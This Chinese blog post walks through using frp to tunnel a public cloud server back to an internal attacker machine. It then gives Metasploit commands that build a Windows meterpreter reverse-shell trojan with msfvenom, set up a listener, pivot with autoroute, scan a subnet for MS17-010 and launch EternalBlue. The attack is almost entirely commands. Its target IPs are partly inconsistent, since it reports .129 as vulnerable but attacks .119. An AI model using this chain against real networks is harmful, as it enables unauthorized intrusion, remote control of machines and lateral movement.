frp 的常规使用

作者: print("") 分类: 信息安全 发布时间: 2019-07-27 00:37

拓扑如下:

阿里云服务器一台

内网 机器一台

https://github.com/fatedier/frp/releases

下载 frp 的服务端: 

[root@btmail frp_0.27.1_linux_amd64]# cat frps.ini 
[common]
bind_port = 7000

然后启动

客户机parot OS

  

[common]
server_addr = 39.105.93.185
server_port = 7000

[ssh]
type = tcp
local_ip = 0.0.0.0
local_port = 4444
remote_port = 6551

启动

此时我们只要打开msf进行简单的配置, 

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
run

然后一个木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444 -f exe x>Xaly.exe

自己点击上线一下

添加一条路由 

run autoroute -s 192.168.1.0/24

查看路由

run autoroute -p

然后ms17010扫描一下 内网 

use auxiliary/scanner/smb/smb_ms17_010 
set rhosts 192.168.1.0/24
set threads 30
run

发现一台 192.168.1.129 存在ms17010 


use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.1.119
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.211



Lhost的IP为session2的被控制的IP

然后开始攻击run



此刻的 192.168.1.211 

被控制的机器当做了一个流量转发的机器。

通过192.168.1.211 的4444端口转到到公网的6551 然后转到了我当前内网的机器

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

您的电子邮箱地址不会被公开。

更多阅读
标签云
Apache2.4.50 Apache ShenYu APISIX APISIX Dashboard cc5 CNVD-2021-49104 CNVD-2022-60632 CobaltStrike CobaltStrike xss CommonsCollections5 Confluence CVE-2021-26084 CVE-2017-18349 CVE-2021-4034 CVE-2021-37580 CVE-2021-41277 CVE-2021-41773 cve-2021-42013 CVE-2021-43798 CVE-2021-44228 CVE-2021-45232 CVE-2021-45232 RCE CVE-2022-22954 CVE-2022-22965 CVE-2022-39197 CVE-2023-28432 Django E-Office grafana keytool store log4j2 MetaBase ONE Access python python爬虫 socks5 socks5搜索 store 证书转换成nginx VMware Workspace ONE Access ysoserial 代理池工具 宝塔面板 泛微 畅捷通 畅捷通漏洞 通达OA